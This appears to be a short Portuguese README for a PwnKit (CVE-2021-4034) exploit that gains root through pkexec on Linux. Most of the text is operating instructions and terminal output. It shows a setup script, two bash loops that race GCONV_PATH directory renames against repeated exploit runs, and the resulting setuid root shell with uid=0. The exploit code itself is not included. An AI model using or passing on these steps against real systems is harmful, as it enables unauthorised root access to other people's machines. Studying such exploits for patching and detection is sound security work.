
Exploit para CVE-2021-4034 (PwnKit) que aproveita uma condição de corrida no pkexec para elevar privilégios para root em sistemas Linux.
Exploit para a vulnerabilidade pwnkit da equipe da Qualys.
Este exploit assume que gcc está presente na máquina alvo.
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
Execute o seguinte comando em uma sessão bash:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
Execute o seguinte comando em outra sessão bash:
while :; do ./exploit; done
Você eventualmente vencerá a corrida e obterá um binário shell que lhe dá
acesso root:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
Um breve artigo sobre a técnica pode ser encontrado no meu blog.